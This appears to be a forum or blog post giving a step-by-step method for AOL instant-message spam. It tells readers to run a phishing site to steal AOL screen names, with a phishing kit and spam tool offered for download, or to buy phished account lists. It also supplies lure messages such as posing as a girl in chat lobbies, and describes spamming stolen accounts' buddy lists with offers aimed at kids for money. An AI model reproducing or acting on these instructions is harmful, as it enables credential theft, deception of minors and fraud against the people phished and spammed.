I don't do this stuff anymore but I have in the past..I've just moved onto better stuff now. So, I'm deciding to share this method for you guys. This is my first ever contribute to Why Work.
This method is basically Spimming (Spamming in IMs). I'll tell you guys one that I used to do involving AOL Spimming.
1. First off, you'll need a program called "sspaim". This program signs on screennames from a list and you can insert any message and it IMs their whole buddylist. I know you won't be able to find it online, so I have attached a link in this thread at the bottom for you guys to download. Feel free to scan it or whatever before you open it.
2. Secondly, you'll need an AOL Phish site set-up (I have attached one you can upload to a free site like 110mb.com or your own domain)
Or you can just buy a 5k or higher fresh phish list from someone, if you care to invest into it and skip this step.
3. What you do after you set up the phisher is you go in lobby chats and since you're starting off small, just pretend to be a girl and phish people. Build a big list. What you do is say stuff like
Quote:
| "hey how come your picture is on this site? http://*INSERTLINKHERE*" |
4. Now that you have that 1k phish list..this is what you do: Get an offer, like ringtones or love calculators or something that kids will like to click on and fill out. Quizzes work well too. You use that phish list with ssPaim and add messages to rotate offers and just respam it every 2-3 hours.
Quote:
| Here is an example of a love offer: "hey did you ever try this? you can find out about your crush lol. go here: http://tinyurl.com/lovecalculator" and here is one of a quiz: "you are stupid, lol my IQ is 126. i bet you cant beat that, but you can try at http://tinyurl.com/iquiz". |
5. You should start seeing clicks and leads if you're doing it right. The bigger your phish list is, the more money you will earn, TRUST ME.There is no way to see referrals since people click links straight from the IMs, referrals should be blank
Now the best part about this is you can just leave the program on and it will do the magic itself, you don't have to do that much work to be honest...so all you lazy fucks have no excuse to whine about this being hard because it's easy.
Be creative and go make some $$$
Download link for ssPaim and Phisher in one file:
http://la.gg/upl/ssPaim___AOL_Phisher.zip
No comments:
Post a Comment